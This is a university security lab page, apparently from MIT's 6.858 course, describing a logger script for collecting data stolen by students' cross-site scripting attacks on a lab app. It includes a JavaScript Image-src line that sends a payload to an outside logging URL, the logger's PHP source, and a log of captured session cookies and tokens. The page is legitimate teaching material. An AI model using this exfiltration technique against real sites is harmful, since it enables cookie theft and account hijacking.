You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Thu, 08 Jan 2026 03:19:17 +0000: student: PyZoobarLogin=grader#f8601e307eae12f3eaf8b0386d0ada77 Thu, 08 Jan 2026 03:05:34 +0000: student: PyZoobarLogin=grader#56b720527bb072c6cafd31188607274c Thu, 08 Jan 2026 02:55:53 +0000: student: PyZoobarLogin=grader#7cf8d2b0ff04d93f331cc3a132d9e5ad Thu, 08 Jan 2026 02:52:48 +0000: student: PyZoobarLogin=grader#afd9b9c381d47b704cf7b4999eaf16ef Wed, 07 Jan 2026 08:58:14 +0000: dorawen: grader/BMSWKZSBLEYN Wed, 07 Jan 2026 08:58:09 +0000: dorawen: grader/UHLMUCKGMKAG Wed, 07 Jan 2026 08:57:59 +0000: dorawen: PyZoobarLogin=grader#47f02cb89f7ebee2b398659fd82dbc8e Wed, 07 Jan 2026 08:57:54 +0000: dorawen: PyZoobarLogin=grader#f9b56a5406be46b888b742b959328ed1 Wed, 07 Jan 2026 08:57:45 +0000: dorawen: PyZoobarLogin=grader#1979e18d7b7b969cbcd3c5ace66c1659 Wed, 07 Jan 2026 08:47:55 +0000: dorawen: grader/IRJAYQCOQHGI Wed, 07 Jan 2026 08:47:45 +0000: dorawen: PyZoobarLogin=grader#63e980bb6f3e1fb72e57be3cbb40c4ab Wed, 07 Jan 2026 08:47:39 +0000: dorawen: PyZoobarLogin=grader#e7230706b25a9df3100275c2220846e7 Wed, 07 Jan 2026 08:47:30 +0000: dorawen: PyZoobarLogin=grader#26bb366ec224d54b22fd1d81889885bb Wed, 07 Jan 2026 08:44:34 +0000: dorawen: PyZoobarLogin=grader#80c5c43ab2514df6a48583b8c730606b Wed, 07 Jan 2026 08:44:29 +0000: dorawen: PyZoobarLogin=grader#47e15d3ba52ea6057b187e1e5b04b1d9 Wed, 07 Jan 2026 08:44:20 +0000: dorawen: PyZoobarLogin=grader#cb89055d69480fed3e18396409859fe5 Wed, 07 Jan 2026 08:35:15 +0000: dorawen: PyZoobarLogin=grader#d93332628bc3bb47a201a69e786d18cc Wed, 07 Jan 2026 08:35:09 +0000: dorawen: PyZoobarLogin=grader#cf76149d7c50f75282699ec046b01138 Wed, 07 Jan 2026 08:35:01 +0000: dorawen: PyZoobarLogin=grader#64b1d3c374b991b27ac56d73ab7a9f91 Wed, 07 Jan 2026 08:20:09 +0000: dorawen: PyZoobarLogin=grader#091a8f71f6b31fce8c91698d47e5e7eb Wed, 07 Jan 2026 08:20:03 +0000: dorawen: PyZoobarLogin=grader#5c01e9a5b8c258567a51070393222785 Wed, 07 Jan 2026 08:19:56 +0000: dorawen: PyZoobarLogin=grader#891c9f634d5781691d2371cd7a943543 Wed, 07 Jan 2026 08:11:50 +0000: dorawen: PyZoobarLogin=grader#4c2871ca5b93ef469558d4ad07bee414 Wed, 07 Jan 2026 08:11:44 +0000: dorawen: PyZoobarLogin=grader#06bb9c3a64e285c47784cc5ba59762a6 Wed, 07 Jan 2026 08:11:35 +0000: dorawen: PyZoobarLogin=grader#e67960c0548114d377b8a3f6c3fe6d20 Wed, 07 Jan 2026 08:10:36 +0000: dorawen: PyZoobarLogin=grader#7110c001aa5e108fceac74ee12b24e27 Wed, 07 Jan 2026 08:10:30 +0000: dorawen: PyZoobarLogin=grader#43272f7d9cbdc495c5a91b2b68631b72 Wed, 07 Jan 2026 08:10:22 +0000: dorawen: PyZoobarLogin=grader#baf285a94ae9b752cabfd95d4f8282d1 Wed, 07 Jan 2026 07:54:20 +0000: dorawen: PyZoobarLogin=grader#30931f1835633a4c008fa59d6a480fba Wed, 07 Jan 2026 07:54:15 +0000: dorawen: PyZoobarLogin=grader#6d6dd430426eb281d78ea19cb2ccd268 Wed, 07 Jan 2026 07:54:07 +0000: dorawen: PyZoobarLogin=grader#27276dc5680b2df9788f1220b9a93ad8 Wed, 07 Jan 2026 07:51:51 +0000: dorawen: PyZoobarLogin=grader#b2634fe7a88469988294f821e6b53e39 Wed, 07 Jan 2026 07:51:45 +0000: dorawen: PyZoobarLogin=grader#3a85ab5e9eba22a5de6ccd9e1e70a478 Wed, 07 Jan 2026 07:51:37 +0000: dorawen: PyZoobarLogin=grader#db8c65a24e927e862624aded2647399f Wed, 07 Jan 2026 07:50:39 +0000: dorawen: PyZoobarLogin=grader#b712805c82401bdec67caf0d03e33c16 Wed, 07 Jan 2026 07:50:34 +0000: dorawen: PyZoobarLogin=grader#4ad139a2ca18ce6306e9eef07d5e453d Wed, 07 Jan 2026 07:50:25 +0000: dorawen: PyZoobarLogin=grader#3d552d3034089b559e0a986f01158138 Wed, 07 Jan 2026 07:43:59 +0000: dorawen: PyZoobarLogin=grader#6430bb16c58aed921699191d989c5a57 Wed, 07 Jan 2026 07:43:54 +0000: dorawen: PyZoobarLogin=grader#83935f479599d8c3124ab391cf2f713c Wed, 07 Jan 2026 07:43:43 +0000: dorawen: PyZoobarLogin=grader#69ea4603059e6116cb24ec121a3c5e75 Wed, 07 Jan 2026 07:02:53 +0000: dorawen: PyZoobarLogin=grader#ba2e6c6b32c86cf9d97a90cfccbc7551 Wed, 07 Jan 2026 07:02:45 +0000: dorawen: PyZoobarLogin=grader#1a56eb83c83a97864b12cad4e7d1a34b Wed, 07 Jan 2026 06:57:06 +0000: dorawen: PyZoobarLogin=grader#35cfdf56fff12d1f403ac4f8a70e82f0 Wed, 07 Jan 2026 06:31:19 +0000: dorawen: PyZoobarLogin=grader#37978f38b9585ef8db1e633b68cd36b8 Mon, 05 Jan 2026 07:25:56 +0000: CONSOLE_TEST: hi Mon, 05 Jan 2026 07:25:04 +0000: LiMeng: hello Sun, 04 Jan 2026 12:27:20 +0000: wangzhentan: PyZoobarLogin=user1#f8147cef586f7b51e2ebd259c225c974 Sun, 04 Jan 2026 12:27:06 +0000: wangzhentan: PyZoobarLogin=user1#f8147cef586f7b51e2ebd259c225c974 Sun, 04 Jan 2026 12:26:56 +0000: wangzhentan: PyZoobarLogin=user1#f8147cef586f7b51e2ebd259c225c974 Sun, 04 Jan 2026 12:26:43 +0000: wangzhentan: PyZoobarLogin=user1#f8147cef586f7b51e2ebd259c225c974 Sun, 04 Jan 2026 12:26:05 +0000: wangzhentan: PyZoobarLogin=user1#f8147cef586f7b51e2ebd259c225c974 Sun, 04 Jan 2026 12:25:41 +0000: wangzhentan: PyZoobarLogin=user1#f8147cef586f7b51e2ebd259c225c974 Sun, 04 Jan 2026 11:23:54 +0000: wangzhentan: PyZoobarLogin=user1#5425374f5bed2bfb0d02095d67c68ce9 Sun, 04 Jan 2026 11:19:06 +0000: wangzhentan: PyZoobarLogin=user1#5425374f5bed2bfb0d02095d67c68ce9 Sun, 04 Jan 2026 08:27:03 +0000: HanMeng: PyZoobarLogin=user1#5425374f5bed2bfb0d02095d67c68ce9 Sun, 04 Jan 2026 08:23:58 +0000: wangzhentan: PyZoobarLogin=user1#5425374f5bed2bfb0d02095d67c68ce9 Sun, 04 Jan 2026 08:22:35 +0000: HanMeng: PyZoobarLogin=user1#5425374f5bed2bfb0d02095d67c68ce9 Sun, 04 Jan 2026 07:54:02 +0000: wangzhentan: PyZoobarLogin=user1#5425374f5bed2bfb0d02095d67c68ce9 Sun, 04 Jan 2026 07:38:07 +0000: my-username: some-string Sun, 04 Jan 2026 06:45:59 +0000: kireii: grader/QSLPHDZLVFLZ@1767509157450 Sun, 04 Jan 2026 06:45:33 +0000: kireii: grader/FFESFOIBFQCC@1767509132892 Sun, 04 Jan 2026 06:45:21 +0000: kireii: PyZoobarLogin=grader#54a03c4452e1e16f0b2eb1e52ad05fb8 Sun, 04 Jan 2026 06:45:13 +0000: kireii: PyZoobarLogin=grader#635f284a60381345b8148037814b12eb Sun, 04 Jan 2026 06:43:15 +0000: kireii: grader/CZGWUBJRFEAW@1767508994109 Sun, 04 Jan 2026 06:42:42 +0000: kireii: PyZoobarLogin=grader#3be5225a02d01f86412b9f737095f14c Sun, 04 Jan 2026 06:42:36 +0000: kireii: PyZoobarLogin=grader#420fbfa59151d3f6e842ad3a6f5f3e95 Sun, 04 Jan 2026 06:39:57 +0000: kireii: grader/ABOQUHZBPOGF@1767508795791 Sun, 04 Jan 2026 06:39:51 +0000: kireii: grader/SWIOEELNOXJE@1767508790340 Sun, 04 Jan 2026 06:39:38 +0000: kireii: PyZoobarLogin=grader#bb9d2d45dede008f445caf89a3472688 Sun, 04 Jan 2026 06:39:32 +0000: kireii: PyZoobarLogin=grader#39453c929828a7cbd99b8d91f489603f Sun, 04 Jan 2026 06:31:16 +0000: kireii: grader/BFZWCABVDCJS@1767508275087 Sun, 04 Jan 2026 06:31:10 +0000: kireii: grader/RIOAIMNAWTAC@1767508269637 Sun, 04 Jan 2026 06:30:57 +0000: kireii: PyZoobarLogin=grader#622ac8315090b5543eadf576cea87a47 Sun, 04 Jan 2026 06:30:50 +0000: kireii: PyZoobarLogin=grader#78cf859bc0b1a9e06ba835cd3e035f0a Sun, 04 Jan 2026 06:14:39 +0000: kireii: grader/VLSEOSPIPXWW@1767507278068 Sun, 04 Jan 2026 06:14:21 +0000: kireii: grader/VMULGPNHSLQA@1767507260498 Sun, 04 Jan 2026 06:14:08 +0000: kireii: PyZoobarLogin=grader#562195dfee2d60c78a83e1d277db4440 Sun, 04 Jan 2026 06:14:03 +0000: kireii: PyZoobarLogin=grader#b22f42fee3fa3fb2ecfe2bf1f547b080 Sun, 04 Jan 2026 06:08:37 +0000: kireii: grader/YRKTIYQVVNMP@1767506916331 Sun, 04 Jan 2026 06:08:18 +0000: kireii: grader/EGATPJDYJQTI@1767506897831 Sun, 04 Jan 2026 06:08:05 +0000: kireii: PyZoobarLogin=grader#518ca7ce725371ba660a7c9e9b9c4969 Sun, 04 Jan 2026 06:07:59 +0000: kireii: PyZoobarLogin=grader#8cba7d0a1405512d138bf3c88ed73a76 Sun, 04 Jan 2026 06:07:47 +0000: kireii: PyZoobarLogin=grader#fb0bccb446a31e775134818607ff09ea Sun, 04 Jan 2026 06:04:58 +0000: kireii: grader/TJJKMJPTZVKZ@1767506697419 Sun, 04 Jan 2026 06:04:53 +0000: kireii: grader/UFXEJHQEPVSM@1767506691979 Sun, 04 Jan 2026 06:04:40 +0000: kireii: PyZoobarLogin=grader#a2613c0502ba007a3bf40b165cf894fa Sun, 04 Jan 2026 06:04:33 +0000: kireii: PyZoobarLogin=grader#6544136591d22cc2d52d1649789edcb7 Sun, 04 Jan 2026 06:02:01 +0000: kireii: grader/DANLGPGGHNZA@1767506520887 Sun, 04 Jan 2026 06:01:39 +0000: kireii: grader/MJUXADNNGLPB@1767506497601 Sun, 04 Jan 2026 06:01:27 +0000: kireii: PyZoobarLogin=grader#81fca67055da9803cd3871b97e9368ce Sun, 04 Jan 2026 06:01:22 +0000: kireii: PyZoobarLogin=grader#00d99429d0df9ec39f50899e7a8fb768 Sun, 04 Jan 2026 06:01:12 +0000: kireii: PyZoobarLogin=grader#4c993b1b6888cb194d8a0e2a6ce716ee Sun, 04 Jan 2026 05:56:57 +0000: kireii: grader/HGNJSASTNKIV@1767506216626 Sun, 04 Jan 2026 05:56:47 +0000: kireii: grader/OMUYAGTFBKTY@1767506206199 Sun, 04 Jan 2026 05:56:41 +0000: kireii: grader/JRPGGQXNHKQG@1767506200757 Sun, 04 Jan 2026 05:56:29 +0000: kireii: PyZoobarLogin=grader#2984fd7e0529c32ad93d071968ea15a8 Sun, 04 Jan 2026 05:56:25 +0000: kireii: PyZoobarLogin=grader#f15189f27703b4bbe40761f61db17fa4 Sun, 04 Jan 2026 05:56:16 +0000: kireii: PyZoobarLogin=grader#0392537fd3a00d9e77feb434eb9b0a01 Sun, 04 Jan 2026 05:52:15 +0000: kireii: grader/FQLIVCSGNZQU@1767505934828 Sun, 04 Jan 2026 05:52:10 +0000: kireii: grader/AHITLGMZJYEC@1767505929367 Sun, 04 Jan 2026 05:51:57 +0000: kireii: PyZoobarLogin=grader#b28eaa59b59f600cb934d6577372f0a7
In case you are curious, here is the source code of this page.
<?php do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.858-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>